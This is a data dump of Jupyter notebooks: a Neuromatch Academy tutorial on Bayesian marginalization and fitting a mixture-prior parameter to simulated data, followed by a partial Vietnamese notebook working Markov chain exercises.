[ [ [ "## Neuromatch Academy 2020 -- Bayes Day (dry run)\n# Tutorial 4 - Marginalization & Fitting to data\n\nPlease execute the cell below to initialize the notebook environment", "_____no_output_____" ] ], [ [ "# @title\nimport time # import time \nimport numpy as np # import numpy\nimport scipy as sp # import scipy\nimport math # import basic math functions\nimport random # import basic random number generator functions\n\nimport matplotlib.pyplot as plt # import matplotlib\nimport matplotlib as mpl\nfrom IPython import display \nfrom scipy.optimize import minimize \n\nfig_w, fig_h = (6, 4)\nplt.rcParams.update({'figure.figsize': (fig_w, fig_h)})\n#plt.style.use('ggplot')\nmpl.rc('figure', max_open_warning = 0)\n\n%matplotlib inline\n%config InlineBackend.figure_format = 'retina'\n\ndef my_gaussian(x_points, mu, sigma):\n \"\"\"\n Returns un-normalized Gaussian estimated at points `x_points`, with parameters: `mu` and `sigma`\n \n Args :\n x_points (numpy arrays of floats)- points at which the gaussian is evaluated\n mu (scalar) - mean of the Gaussian\n sigma (scalar) - std of the gaussian\n\n Returns: \n un-normalized Gaussian (i.e. 
without constant) evaluated at `x`\n \"\"\"\n return np.exp(-(x_points-mu)**2/(2*sigma**2))\n\ndef moments_myfunc(x_points, function):\n \"\"\"\n DO NOT EDIT THIS FUNCTION !!!\n\n Returns the mean, median and mode of an arbitrary function\n\n Args : \n x_points (numpy array of floats) - x-axis values\n function (numpy array of floats) - y-axis values of the function evaluated at `x_points`\n\n Returns:\n (tuple of 3 scalars): mean, median, mode\n \"\"\"\n \n # Calc mode of arbitrary function\n mode = x_points[np.argmax(function)]\n\n # Calc mean of arbitrary function\n mean = np.sum(x_points * function)\n\n # Calc median of arbitrary function\n cdf_function = np.zeros_like(x_points)\n accumulator = 0\n for i in np.arange(x.shape[0]):\n accumulator = accumulator + function[i]\n cdf_function[i] = accumulator\n idx = np.argmin(np.abs(cdf_function - 0.5))\n median = x_points[idx]\n\n return mean, median, mode", "_____no_output_____" ] ], [ [ "---\n\n### Tutorial objectives\n \nIn this notebook we'll have a look at computing the Marginalization Matrix and the Marginal in order to perform model inversion (i.e.: recovering the model parameters given a participant's data). \n\nThe generative model will be the same Bayesian model we have been using in Tutorial 3 (Mixture of Gaussian Prior and Gaussian Likelihood).\n", "_____no_output_____" ], [ "---\n### EXERCISE 1: Mixture of Gaussian prior\n \nSimilarly to Tutorial 2, we now want to create a prior matrix using a mixture of gaussians prior.\n\n**Suggestions**\n\nUsing the equation for the un-normalised Gaussian `my_gaussian`\n* Generate a Gaussian with mean 0 and standard deviation 0.5\n* Generate another Gaussian with mean 0 and standard deviation 10\n* Combine the two Gaussians to make a new prior by mixing the two Gaussians with mixing parameter alpha = 0.05. 
Make it such that the peakier Gaussian has 95% of the weight (don't forget to normalize afterwards)\n* This will be the first row of your prior matrix\n* Now repeat (hint: use np.tile) that row prior to make a matrix of 1000 (i.e. `hypothetical_stim.shape[0]`) row-priors.\n* Plot the matrix using the function `plt.matshow` already pre-written and commented-out in your script", "_____no_output_____" ] ], [ [ "hypothetical_stim = np.linspace(-8,8,1000)\nx = np.arange(-10,10,0.1)\n\n##################\n## Insert your code here to:\n## - Generate a mixture of gaussian prior with mean 0 and std 0.5 and 10 respectively\n## - Tile that row prior in order to make a matrix of 1000 row priors\n## (Hint: use np.tile() and np.reshape())\n## - Plot the Prior Matrix using the code snippet commented-out below\n##################\n\n# fig = plt.figure(figsize=(15,15))\n# ax = fig.add_subplot(111)\n# ax.imshow(prior_matrix)\n# ax.set_xlabel('x')\n# ax.set_title('Prior Matrix: p(x)')\n# ax.set_ylabel('Repetitions')\n# ax.set_aspect('auto')", "_____no_output_____" ], [ "######\n## Solution\n######\nhypothetical_stim = np.linspace(-8,8,1000)\nx = np.arange(-10,10,0.1)\n\nalpha=0.05\nprior_mean = 0\nprior_sigma1 = 0.5\nprior_sigma2 = 3\nprior1 = my_gaussian(x, prior_mean, prior_sigma1)\nprior2 = my_gaussian(x, prior_mean, prior_sigma2)\n\nprior_combined = (1-alpha) * prior1 + (alpha * prior2) \nprior_combined = prior_combined / np.sum(prior_combined)\n\nprior_matrix = np.tile(prior_combined, hypothetical_stim.shape[0]).reshape((hypothetical_stim.shape[0],-1))\n\nfig = plt.figure(figsize=(15,15))\nax = fig.add_subplot(111)\nax.imshow(prior_matrix)\nax.set_xlabel('x')\nax.set_title('Prior Matrix: p(x)')\nax.set_ylabel('Repetitions for different hypothetical stimuli')\nax.set_aspect('auto')", "_____no_output_____" ] ], [ [ "---\n### EXERCISE 2: Implement a Likelihood Matrix\n \nWe now want to create a Likelihood matrix that is made up of a Gaussian on each row of the matrix. 
Each row represents a different hypothetically presented stimulus with a different stimulus offset (i.e. a different likelihood mean).\n\n**Suggestions**\n\n Using the equation for the un-normalised Gaussian `my_gaussian` and the values in `hypothetical_stim`:\n* Create a Gaussian likelihood with mean varying from `hypothetical_stim`, keeping $\\sigma$ constant at 1.\n* Each Likelihood with a different mean will make up a different row-likelihood of your matrix, such that you end up with a Likelihood matrix made up of 1000 row-Gaussians with different means.\n* Plot the matrix using the function `plt.matshow` already pre-written and commented-out in your script", "_____no_output_____" ] ], [ [ "likelihood_matrix = np.zeros_like(prior_matrix)\n\n##################\n## Insert your code here to:\n## - Generate a likelihood matrix using `my_gaussian` function, with sigma = 1,\n## and varying the mean using `hypothetical_stim` values.\n## - Plot the Prior Matrix using the code snippet commented-out below\n##################\n\n# fig = plt.figure(figsize=(15,15))\n# ax = fig.add_subplot(111)\n# ax.imshow(likelihood_matrix)\n# ax.set_xlabel('x')\n# ax.set_title('Likelihood Matrix : p(x_tilde|x)')\n# ax.set_ylabel('x_tilde : Brain representation of x')\n# ax.set_aspect('auto')", "_____no_output_____" ], [ "#####\n## Solution\n#####\n\nlikelihood_matrix = np.zeros_like(prior_matrix)\n\nfor i_likelihood in np.arange(hypothetical_stim.shape[0]):\n likelihood_matrix[i_likelihood,:] = my_gaussian(x, hypothetical_stim[i_likelihood], 1)\n likelihood_matrix[i_likelihood,:] = likelihood_matrix[i_likelihood,:] / np.sum(likelihood_matrix[i_likelihood,:])\n\nfig = plt.figure(figsize=(15,15))\nax = fig.add_subplot(111)\nax.imshow(likelihood_matrix)\nax.set_xlabel('x')\nax.set_title('Likelihood Matrix : p(x_tilde|x)')\nax.set_ylabel('x_tilde : Brain representation of x')\nax.set_aspect('auto')", "_____no_output_____" ] ], [ [ "---\n### EXERCISE 3: Implement the Posterior Matrix\n \nWe 
now want to create the Posterior matrix. To do so, we will compute the posterior using *Bayes rule* for each trial (i.e. row_wise).\n\nThat is, each row of the posterior matrix will be the posterior resulting from the multiplication of the prior and likelihood of the equivalent row.\n\nMathematically:\n\n\\begin{eqnarray}\n Posterior\\left[i, :\\right] \\propto Likelihood\\left[i, :\\right] \\odot Prior\\left[i, :\\right]\n\\end{eqnarray}\n\nwhere $\\odot$ represent the [Hadamard Product](https://en.wikipedia.org/wiki/Hadamard_product_(matrices)) (i.e. the element_wise multiplication) of the Prior and Likelihood row vectors `i` from the matrix.\n\n**Suggestions**\n\n* For each row (trial) of the Prior and Likelihood matrix, calculate posterior and fill in the Posterior matrix, such that each row of the Posterior matrix is represent the posterior for a different trial.\n* Plot the matrix using the function `plt.matshow` already pre-written and commented-out in your script", "_____no_output_____" ] ], [ [ "posterior_matrix = np.zeros_like(likelihood_matrix)\n\n###############################################################################\n## Insert your code here to:\n## For each row of the Prior & Likelihood Matrices, calculate the resulting posterior \n## Fill the Posterior Matrix with the row_posterior\n## Plot the Posterior Matrix using the code snippet provided below\n###############################################################################\n\n# fig = plt.figure(figsize=(15,15))\n# ax = fig.add_subplot(111)\n# ax.imshow(posterior_matrix)\n# ax.set_xlabel('x')\n# ax.set_title('Posterior Matrix : p(x | x_tilde)')\n# ax.set_ylabel('x_tilde')\n# ax.set_aspect('auto')", "_____no_output_____" ], [ "######\n## Solution\n######\n\nposterior_matrix = np.zeros_like(likelihood_matrix)\n\nfor i_posterior in np.arange(posterior_matrix.shape[0]):\n posterior_matrix[i_posterior,:] = np.multiply(prior_matrix[i_posterior,:], likelihood_matrix[i_posterior,:])\n 
posterior_matrix[i_posterior,:] = posterior_matrix[i_posterior,:] / np.sum(posterior_matrix[i_posterior,:])\n\nfig = plt.figure(figsize=(15,15))\nax = fig.add_subplot(111)\nax.imshow(posterior_matrix)\nax.set_xlabel('x')\nax.set_title('Posterior Matrix : p(x | x_tilde)')\nax.set_ylabel('x_tilde : Brain representation of x')\nax.set_aspect('auto')", "_____no_output_____" ] ], [ [ "---\n### EXERCISE 4: Implement the Binary Decision Matrix\n \nWe now want to create the a Binary Decision Matrix. To do so, we will scan the Posterior matrix (i.e. row_wise), and set the matrix cell to 1 at the mean of the row posterior.\n\n\nThis, effectively encodes the *decision* that a participant may make on a given trial (i.e. row). In this case, the modelled decision rule is to take the mean of the posterior on each trial (use the function `moments_myfunc()` provided to calculate the mean of the posterior).\n\n**Suggestions**\n* For each row (trial) of the Posterior matrix, calculate the mode of the posterior, and set the corresponding cell of the Binary Decision Matrix to 1. (e.g. if the mode of the posterior is at position 0, then set the cell with x_column == 0 to 1).\n* Plot the matrix using the function `plt.matshow` already pre-written and commented-out in your script", "_____no_output_____" ] ], [ [ "binary_decision_matrix = np.zeros_like(posterior_matrix)\n\n###############################################################################\n## Insert your code here to:\n## Create a matrix of the same size as the Posterior matrix and fill it with zeros (Hint: use np.zeros_like())\n## For each row of the Posterior Matrix, calculate the mean of the posterior using the function povided `moments_myfunc()`, and set the corresponding cell of the Binary Decision Matrix to 1. 
\n## Plot the Posterior Matrix using the function `plt.pcolor` and the code snippet provided below\n###############################################################################\n\n# fig = plt.figure(figsize=(15,15))\n# ax = fig.add_subplot(111)\n# ax.imshow(binary_decision_matrix)\n# ax.set_xlabel('x_tilde')\n# ax.set_title('Binary Decision Matrix : x_hat = mean(x_tilde)')\n# ax.set_ylabel('x_hat')\n# ax.set_aspect('auto')", "_____no_output_____" ], [ "############\n# Solution\n############\nbinary_decision_matrix = np.zeros_like(posterior_matrix)\n\nfor i_posterior in np.arange(posterior_matrix.shape[0]):\n mean, _, _ = moments_myfunc(x, posterior_matrix[i_posterior,:])\n idx = np.argmin(np.abs(x - mean))\n binary_decision_matrix[i_posterior,idx] = 1 \n\nfig = plt.figure(figsize=(15,15))\nax = fig.add_subplot(111)\nax.imshow(binary_decision_matrix)\nax.set_xlabel('x_tilde')\nax.set_title('Binary Decision Matrix : x_hat = mean(x_tilde)')\nax.set_ylabel('x_hat')\nax.set_aspect('auto')", "_____no_output_____" ] ], [ [ "---\n### EXERCISE 5: Implement the Input Matrix\n \nWe now want to create the Input Matrix from the true presented stimulus. That is, we will now create a Gaussian centered around the true presented stimulus, with sigma = 1. and repeat that gaussian distribution across x values. That is we want to make a *Column* gaussian centered around the true presented stimulus, and repeat this *Column* Gaussian across all values of the x-axis matrix.\n\nThis, effectively encodes the distribution of the true stimulus (one single simulus) for that a participant on a given trial. 
\n\n**Suggestions**\n\nAssume the true stimulus is presented at direction -2.5\n* Create a Gaussian likelihood with mean = -2.5 with $\\sigma$ constant at 1.\n* Make this the first column of your Matrix and repeat that *column* Gaussian to fill in the True_Presented_Stimulus Matrix.\n* Plot the matrix using the function `plt.matshow` already pre-written and commented-out in your script", "_____no_output_____" ] ], [ [ "input_matrix = np.zeros_like(posterior_matrix)\n\n##################\n## Insert your code here to:\n## - Generate a gaussian centered on the true stimulus -2.5 with sigma = 1\n## - Tile that column input Gaussian in order to complete the matrix\n## (Hint: use np.tile() and np.reshape())\n## - Plot the Matrix using the code snippet commented-out below\n##################\n\n# fig = plt.figure(figsize=(15,15))\n# ax = fig.add_subplot(111)\n# ax.imshow(input_matrix)\n# ax.set_xlabel('x')\n# ax.set_title('Input Matrix: p(x_tilde | x = -2.5)')\n# ax.set_ylabel('x_tilde')\n# ax.set_aspect('auto')", "_____no_output_____" ], [ "############\n# Solution\n############\ninput_matrix = np.zeros_like(posterior_matrix)\n\nfor i in np.arange(x.shape[0]):\n input_matrix[:, i] = my_gaussian(hypothetical_stim, -2.5, 1)\n input_matrix[:, i] = input_matrix[:, i] / np.sum(input_matrix[:, i])\n\nfig = plt.figure(figsize=(15,15))\nax = fig.add_subplot(111)\nax.imshow(input_matrix)\nax.set_xlabel('x')\nax.set_title('Input Matrix: p(x_tilde | x = -2.5)')\nax.set_ylabel('x_tilde')\nax.set_aspect('auto')", "_____no_output_____" ] ], [ [ "---\n### EXERCISE 5: Implement the Marginalization Matrix\n \nWe now want to compute the Marginalization Matrix from the true presented stimulus, and our Binary decision matrix over hypothetical stimulus inputs. 
\n\nMathematically, this means that we want to compute:\n\n\\begin{eqnarray}\n Marginalization Matrix = Input Matrix \\odot Binary Matrix\n\\end{eqnarray}\n\n\\begin{eqnarray}\n Marginal = \\int_{x} Marginalization Matrix\n\\end{eqnarray}\n\nwhere $\\odot$ represent the [Hadamard Product](https://en.wikipedia.org/wiki/Hadamard_product_(matrices)) (i.e. the element_wise multiplication) of the Input matrix and Binary matrix.\n\n**Suggestions**\n\n* For each row of the Input and Binary matrix, calculate product of the two and fill in the Marginal matrix.\n* Plot the matrix using the function `plt.matshow` already pre-written and commented-out in your script\n* Calcualte and plot the Marginal over `x` using the code snippet commented out in your script\n - Note how the limitations of numerical integration create artifacts on your marginal ", "_____no_output_____" ] ], [ [ "marginalization_matrix = np.zeros_like(posterior_matrix)\n\n###############################################################################\n## Insert your code here to:\n## Compute the Marginalization matrix by multiplying pointwise the Binary decision matrix over hypothetical stimuli and the Input Matrix\n## Compute the Marginal from the Marginalization matrix by summing over x (hint: use np.sum())\n## Plot the Marginalization Matrix and the resulting Marginal using the code snippet provided below\n###############################################################################\n\n# fig = plt.figure(figsize=(15,15))\n# ax = fig.add_subplot(111)\n# ax.imshow(marginalization_matrix)\n# ax.set_xlabel('x')\n# ax.set_title('Marginalization Matrix: p(x_hat | x)')\n# ax.set_ylabel('x_hat')\n# ax.set_aspect('auto')\n\n# plt.figure(figsize=(15,15))\n# plt.plot(x, marginal)\n# plt.xlabel('x_hat')\n# plt.ylabel('probability')\n# plt.show()", "_____no_output_____" ], [ "############\n# Solution\n############\nmarginalization_matrix = np.zeros_like(posterior_matrix)\n\nmarginalization_matrix = input_matrix * 
binary_decision_matrix\n\nmarginal = np.sum(marginalization_matrix, axis=0)\nmarginal = marginal / np.sum(marginal)\n\nfig = plt.figure(figsize=(15,15))\nax = fig.add_subplot(111)\nax.imshow(marginalization_matrix)\nax.set_xlabel('x')\nax.set_title('Marginalization Matrix: p(x_hat | x)')\nax.set_ylabel('x_hat')\nax.set_aspect('auto')\n\nplt.figure(figsize=(15,15))\nplt.plot(x, marginal)\nplt.xlabel('x_hat')\nplt.ylabel('probability')\nplt.title('Marginal : p(x_hat |x)')\nplt.show()", "_____no_output_____" ] ], [ [ "---\n### EXERCISE 6: Generate some Data\n\nNow that we've seen how to calculate the posterior and marginalize to get $p(\\hat{x} \\mid x)$ we will generate some artificial data for a single participant using the `generate_data()` function provided, and mixing parameter $\\alpha$ = 0.1\n\nPlease run the code below:", "_____no_output_____" ] ], [ [ "def generate_data(x_stim, alpha):\n \"\"\"\n DO NOT EDIT THIS FUNCTION !!!\n\n Returns the mean, median and mode of an arbitrary function\n\n Args : \n x_stim (numpy array of floats) - x values at which stimuli are presented\n alpha (scalar) - mixture component for the Mixture of Gaussian prior\n\n Returns:\n (numpy array of floats): x_hat response of participant for each stimulus\n \"\"\"\n x = np.arange(-10,10,0.1)\n x_hat = np.zeros_like(x_stim)\n\n prior_mean = 0\n prior_sigma1 = .5\n prior_sigma2 = 3\n prior1 = my_gaussian(x, prior_mean, prior_sigma1)\n prior2 = my_gaussian(x, prior_mean, prior_sigma2)\n\n prior_combined = (1-alpha) * prior1 + (alpha * prior2) \n prior_combined = prior_combined / np.sum(prior_combined)\n\n for i_stim in np.arange(x_stim.shape[0]):\n likelihood_mean = x_stim[i_stim]\n likelihood_sigma = 1\n likelihood = my_gaussian(x, likelihood_mean, likelihood_sigma)\n likelihood = likelihood / np.sum(likelihood)\n\n posterior = np.multiply(prior_combined, likelihood)\n posterior = posterior / np.sum(posterior)\n \n # Assumes participant takes posterior mean as 'action'\n x_hat[i_stim] = 
np.sum(x * posterior)\n return x_hat\n\nrandom.seed(0)\n\n# Generate data for a single participant\ntrue_stim = np.array([-8, -4, -3, -2.5, -2, -1.5, -1, -0.5, 0, 0.5, 1, 1.5, 2, 2.5, 3, 4, 8])\nbehaviour = generate_data(true_stim, 0.1)\n\n# Plot of data\nplt.figure(figsize=(8,6))\nplt.plot(true_stim, true_stim - behaviour, '-k', linewidth=2, label='data')\nplt.legend()\nplt.xlabel('Position of true visual stimulus (cm)')\nplt.ylabel('Participant deviation from true stimulus (cm)');", "_____no_output_____" ] ], [ [ "---\n### EXERCISE 7: Model fitting to generated data\n\nNow that we have generated some data and that we have seen how to calculate the posterior and marginalize to get $p(\\hat{x} \\mid x)$ we will attempt to recover the parameter alpha = 0.05 that was use to generate the data.\n\nWe have provided you with an incomplete function called `my_Bayes_model_mse()` that needs to be completed to perform the same computations you have performed in the previous exercises but over all the participant's trial, as opposed to a single trial.\n\nThe Likelihood, has already been constructed and will not change since they depend on hypothetical stimuli. We will however have to implement the Prior matrix since it depends on $\\alpha$ as well as recomputing the Posterior, Input and the marginalization matrix to compute the marginal in order to get $p(\\hat{x} \\mid x)$. Using $p(\\hat{x} \\mid x)$, we can then compute the negative Log-Likelihood for each trial in order to find the parameter that minimizes the negative Log-Likelihood (i.e. Maximises the Log-Likelihood).\n\nTrials are assumed to be independent from one another. 
Mathematically this means that we can define the negative Log-Likelihood as:\n\n\n\\begin{eqnarray}\n -LL = - \\sum_i \\log p(\\hat{x_i} \\mid x_i)\n\\end{eqnarray}\n\nwhere $\\hat{x_i}$ is the participant's response for trial $i$, with presented stimulus $x_i$ \n\n**Suggestions**\n\n* Complete the function my_Bayes_model_mse, to calculate the Prior, Posterior,Input and Marginalization matrix on each trial\n* Compute the marginal using the marginalization matrix on each trial\n* Compute the negative log likelihood using the marginal and the participant's response\n* Using the code snippet commented out in your script to loop over possible values of $\\alpha$\n* Bonus question : Use the optimization function `minimize` to find the optimal value of $\\alpha$.\n - Note how the limitations of numerical integration create artifacts on your marginal and the resulting negative Log-likelihood", "_____no_output_____" ] ], [ [ "def my_Bayes_model_mse(params):\n \"\"\"\n Function fits the Bayesian model from Tutorial 3 \n \n Args : \n params (list of positive floats): parameters used by the model (params[0] = posterior scaling)\n \n Returns :\n (scalar) negative log-likelihood :sum of log probabilities\n \"\"\"\n \n\n trial_ll = np.zeros_like(true_stim)\n\n ###############################################################################\n ## Insert your code here to:\n ## Compute the Prior matrix given `alpha`\n ## Compute the Posterior matrix\n ## Compute the Binary decision matrix\n ###############################################################################\n\n # Loop over stimuli\n for i_stim in np.arange(true_stim.shape[0]):\n \n ###############################################################################\n ## Insert your code here to:\n ## Compute the Input matrix \n ## Compute the Marginalization matrix\n ## Compute the Marginal\n ## Compute and return the negative log likelihood of the participant\n 
###############################################################################\n raise NotImplementedError(\"You need to complete this function!\")\n\nx = np.arange(-10,10,0.1)\n\n# Plot neg-LogLikelihood for different values of alpha\nalpha_tries = np.arange(0.01,0.3,0.01)\nnll = np.zeros_like(alpha_tries)\nfor i_try in np.arange(alpha_tries.shape[0]):\n nll[i_try] = my_Bayes_model_mse(np.array([alpha_tries[i_try]]))\n\nplt.figure(2)\nplt.plot(alpha_tries, nll)\nplt.xlabel('alpha value')\nplt.ylabel('negative log-likelihood')\nplt.axvline(alpha_tries[np.argmin(nll)])\nplt.show()\nprint(f\"Best parameters estimated, scaling parameter alpha: {alpha_tries[np.argmin(nll)]:.2f}\")\n\n# Parameters for optimization\nx0 = [0.05] # Initial guess for parameters\nbounds = [(0.01,1)] # Optimization bounds\n\n# result = minimize(...)\n# print(f\"Best parameters estimated using minimization function, scaling parameter alpha: {result.x[0]:.2f}\")", "_____no_output_____" ], [ "############\n# Solution\n############\ndef my_Bayes_model_mse(params):\n \"\"\"\n Function fits the Bayesian model from Tutorial 3 \n \n Args : \n params (list of positive floats): parameters used by the model (params[0] = posterior scaling)\n \n Returns :\n (scalar) negative log-likelihood :sum of log probabilities\n \"\"\"\n trial_ll = np.zeros_like(true_stim)\n\n ## Create the prior Matrix outside of trial loop\n alpha=params[0]\n prior_mean = 0\n prior_sigma1 = 0.5\n prior_sigma2 = 3\n prior1 = my_gaussian(x, prior_mean, prior_sigma1)\n prior2 = my_gaussian(x, prior_mean, prior_sigma2)\n prior_combined = (1-alpha) * prior1 + (alpha * prior2) \n prior_combined = prior_combined / np.sum(prior_combined)\n prior_matrix = np.tile(prior_combined, hypothetical_stim.shape[0]).reshape((hypothetical_stim.shape[0],-1))\n\n ## Create posterior matrix outside of trial loop\n posterior_matrix = np.zeros_like(likelihood_matrix)\n for i_posterior in np.arange(posterior_matrix.shape[0]):\n 
posterior_matrix[i_posterior,:] = np.multiply(prior_matrix[i_posterior,:], likelihood_matrix[i_posterior,:])\n posterior_matrix[i_posterior,:] = posterior_matrix[i_posterior,:] / np.sum(posterior_matrix[i_posterior,:])\n\n ## Create Binary decision matrix outside of trial loop\n binary_decision_matrix = np.zeros_like(posterior_matrix)\n for i_posterior in np.arange(posterior_matrix.shape[0]):\n mean, _, _ = moments_myfunc(x, posterior_matrix[i_posterior,:])\n idx = np.argmin(np.abs(x - mean))\n binary_decision_matrix[i_posterior,idx] = 1 \n\n # Loop over stimuli\n for i_stim in np.arange(true_stim.shape[0]):\n input_matrix = np.zeros_like(posterior_matrix)\n for i in np.arange(x.shape[0]):\n input_matrix[:, i] = my_gaussian(hypothetical_stim, true_stim[i_stim], 1)\n input_matrix[:, i] = input_matrix[:, i] / np.sum(input_matrix[:, i])\n\n marginalization_matrix = input_matrix * binary_decision_matrix\n\n marginal = np.sum(marginalization_matrix, axis=0)\n marginal = marginal / np.sum(marginal)\n\n action = behaviour[i_stim]\n idx = np.argmin(np.abs(x - action))\n\n trial_ll[i_stim] = np.log(marginal[idx] + np.finfo(float).eps)\n\n neg_ll = -np.sum(trial_ll)\n\n return neg_ll\n\nx = np.arange(-10,10,0.1)\n\n# Plot neg-LogLikelihood for different values of alpha\nalpha_tries = np.arange(0.01,0.3,0.01)\nnll = np.zeros_like(alpha_tries)\nfor i_try in np.arange(alpha_tries.shape[0]):\n nll[i_try] = my_Bayes_model_mse(np.array([alpha_tries[i_try]]))\n\nplt.figure(2)\nplt.plot(alpha_tries, nll)\nplt.xlabel('alpha value')\nplt.ylabel('negative log-likelihood')\nplt.axvline(alpha_tries[np.argmin(nll)])\nplt.show()\nprint(f\"Best parameters estimated, scaling parameter alpha: {alpha_tries[np.argmin(nll)]:.2f}\")\n\n# Parameters for optimization\nx0 = [0.05] # Initial guess for parameters\nbounds = [(0.01,1)] # Optimization bounds\n\nresult = minimize(my_Bayes_model_mse, x0, method='SLSQP', bounds=bounds)\nprint(f\"Best parameters estimated using minimization function, scaling 
parameter alpha: {result.x[0]:.2f}\")", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ] ]
e72fe77ceb950d6f1ca25c0d9ffcf9df68014a44
8,680
ipynb
Jupyter Notebook
assignment/.ipynb_checkpoints/Assignment_4.2-checkpoint.ipynb
jurgendn/processviz
82808a92662962f04c48673c9cf159d7bc904ff7
[ "BSD-3-Clause" ]
null
null
null
assignment/.ipynb_checkpoints/Assignment_4.2-checkpoint.ipynb
jurgendn/processviz
82808a92662962f04c48673c9cf159d7bc904ff7
[ "BSD-3-Clause" ]
null
null
null
assignment/.ipynb_checkpoints/Assignment_4.2-checkpoint.ipynb
jurgendn/processviz
82808a92662962f04c48673c9cf159d7bc904ff7
[ "BSD-3-Clause" ]
2
2020-03-19T11:14:13.000Z
2021-08-14T14:24:08.000Z
29.726027
665
0.454378
[ [ [ "**Nguyễn Tiến Dũng**\n\n20170062\n\nKSTN Toán Tin - K62\n\n*Đại học Bách khoa Hà Nội*", "_____no_output_____" ] ], [ [ "import processviz as pvz", "[[1.61486158 1.02476931 0.63137445 0.36911122 0.19426906 0.07770763]\n [1.53715396 2.56192326 1.57843613 0.92277805 0.48567266 0.19426906]\n [1.42059252 2.3676542 2.99902865 1.75327829 0.92277805 0.36911122]\n [1.24575036 2.07625061 2.62991744 2.99902865 1.57843613 0.63137445]\n [0.98348713 1.63914522 2.07625061 2.3676542 2.56192326 1.02476931]\n [0.59009228 0.98348713 1.24575036 1.42059252 1.53715396 1.61486158]]\n['2', '3', '4', '5', '6', '7']\n[[ 3.91209325]\n [ 7.28023312]\n [ 9.83244293]\n [11.16075765]\n [10.65322972]\n [ 7.39193783]]\n" ] ], [ [ "**Câu 1:**\n\nĐầu tiên, dễ thấy $(X_n)$ là một xích Markov.\n\nTa tìm ma trận xác suất chuyển của xích:\n$$\nP = \\left(\\begin{matrix}0& \\frac{1}{2} & 0 & \\frac{1}{2}\\\\\\frac{1}{2} & 0 & \\frac{1}{2} & 0 \\\\0& \\frac{1}{2} & 0 & \\frac{1}{2}\\\\\\frac{1}{2} & 0 & \\frac{1}{2} & 0\\end{matrix}\\right)\n$$\n*a.* Dễ thấy xích Markov trên là tối giản.\n\nCác trang thái có chu kì là", "_____no_output_____" ] ], [ [ "G1 = pvz.MarkovChain()\nG1.from_file('./ass4.2/input_1.csv')\nG1.classify_state()", "_____no_output_____" ] ], [ [ "*b.*Gọi 1 dãy các bước đi ngẫu nhiên của con châu chấu là $(x_0,...,x_{100})$. Dễ thây để con châu chấu trở lại $x_0$ sau đúng 100 bước thì cần có $x_0 = x_{100}$ và $x_i \\ne x_0,\\forall i = \\overline{1,99}$. \n\nTa có $x_0 = 0$. Điều này dẫn đến $x_1 = 2$. Tại thời điểm $2n$ thấy rằng $x_{2n} \\in \\{1,3\\}$ và $x_{2n+1} = 2$. Do đó số trường hợp để con châu chấu quay trở lại điểm xuất phát sau 100 bước là $\\frac{1}{2^{50}}$. ", "_____no_output_____" ], [ "---\n\n**Câu 2:** Gọi $(X_n)$ là trạng thái của đồng xu tại lần tung thứ $n, n \\ge 0$. Hiển nhiên $(X_n)$ là một xích Markov.\n\nXét $Y_n = (X_n, X_{n+1}, X_{n+2})$. 
Ta chứng minh $(Y_n)$ là một xích Markov.\n\nThật vậy, ta có \n$$\n\\begin{aligned}P(Y_{n+1} = y_{n+1}|Y_{n} = y_n) &= P[(X_n, X_{n+1}, X_{n+2}) = (i_n, j_{n+1}, k_{n+2})|(X_{n-1}, X_n, X_{n+1}) = (i_{n-1}, j_{n}, k_{n+1})] \\\\&= P[X_n, X_{n+1}, X_{n+2} = i_n, j_{n+1}, k_{n+2}|X_{n-1}, X_n, X_{n+1} = i_{n-1}, j_{n}, k_{n+1}]\\label{eq1}\\end{aligned}\n$$\nLại có \n$$\n\\begin{aligned}&P(Y_{n+1} = y_{n+1}|Y_{n} = y_n,..,Y_0) \\\\&= P[(X_n, X_{n+1}, X_{n+2}) = (i_n, j_{n+1}, k_{n+2})|(X_{n-1}, X_n, X_{n+1}) = (i_{n-1}, j_{n}, k_{n+1}),...,(X_0, X_1, X_2) = (i_0, j_1, k_2)] \\\\&= P[X_n, X_{n+1}, X_{n+2} = i_n, j_{n+1}, k_{n+2}|X_{n-1}, X_n, X_{n+1} = i_{n-1}, j_{n}, k_{n+1},...,X_0 = i_0] \\\\& = \\frac{P(X_{n+2} = i_{n+2},...,X_0 = i_0)}{P(X_{n+1},..,X_0 = i_0)} \\\\& = \\frac{P[X_{n+2}, X_{n+1}, X_{n} = i_n, j_{n+1}, k_{n+2}|X_{n+1}, X_n, X_{n-1}]}{P[X_{n+1}, X_{n}, X_{n-1},...,X_0]} \\\\& = P[X_n, X_{n+1}, X_{n+2} = i_n, j_{n+1}, k_{n+2}|X_{n-1}, X_n, X_{n+1} = i_{n-1}, j_{n}, k_{n+1}]\\label{eq2}\\end{aligned}\n$$\nVậy từ đó ta có $(Y_n)$ là xích Markov.\n\nKhông gian trạng thái $I = \\{(x, y, z) \\in \\{S, N\\}^3 \\}$\n\nMa trận xác suất chuyển $P$ được xác định như sau:", "_____no_output_____" ] ], [ [ "G2 = pvz.MarkovChain()\nG2.from_file('./ass4.2/input_2.csv')", "_____no_output_____" ], [ "G2.get_period('NSN')", "_____no_output_____" ] ], [ [ "Vậy trung bình mất số lần tung như trên để đạt đến trạng thái $NSN$\n\n---", "_____no_output_____" ], [ "**Câu 3:**\n\nKhông gian trạng thái `I = {CS_THONGTHUONG, CS_DACBIET,CS_TANGCUONG,DONG_HOP, KHOI_BENH}`\n\nMa trận xác suất chuyển\n\n| CS_THONGTHUONG | CS_DACBIET | CS_TANGCUONG | DONG_HOP | KHOI_BENH |\n| -------------- | ---------- | ------------ | -------- | --------- |\n| 0.3 | 0.15 | 0 | 0 | 0.55 |\n| 0.2 | 0.55 | 0.1 | 0.05 | 0.1 |\n| 0.05 | 0.3 | 0.55 | 0.1 | 0 |\n| 0 | 0 | 0 | 1 | 0 |\n| 0 | 0 | 0 | 0 | 1 |\n\nPhân phối ban đầu \n\n| CS_THONGTHUONG | CS_DACBIET | CS_TANGCUONG | DONG_HOP | KHOI_BENH |\n| 
